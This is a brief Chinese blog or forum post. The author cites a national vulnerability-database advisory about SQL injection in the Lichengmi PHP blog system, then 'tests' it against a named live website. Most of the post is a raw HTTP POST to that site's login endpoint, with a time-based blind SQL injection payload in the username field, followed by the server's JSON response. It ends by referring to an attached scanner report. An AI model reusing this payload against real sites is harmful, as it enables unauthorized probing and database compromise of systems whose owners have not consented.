看到国家的CNNVD网站有一个标题《里程密PHP博客系统存在SQL注入漏洞
》

来吧我们来测试一下！

POST /index.php?a=login&c=user&m=home HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://blog.fudong.top/
Cookie: PHPSESSID=jhide8evqsav9oh6u87hea9co5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 81
Host: blog.fudong.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

password=g00dPa%24%24w0rD&username=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z```

回显

HTTP/1.1 200 OK
Server: JSP3/2.0.14
Date: Tue, 10 Nov 2020 08:24:27 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Accept-Ranges: bytes
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Timing-Allow-Origin: *
Ohc-File-Size: -1
Content-Length: 61

{"info":"\u767b\u9646\u5931\u8d25\uff01","status":0,"url":""}

就这多、到这就够了！

用工具扫描的报告！
里程密PHP.zip (31.5 KB)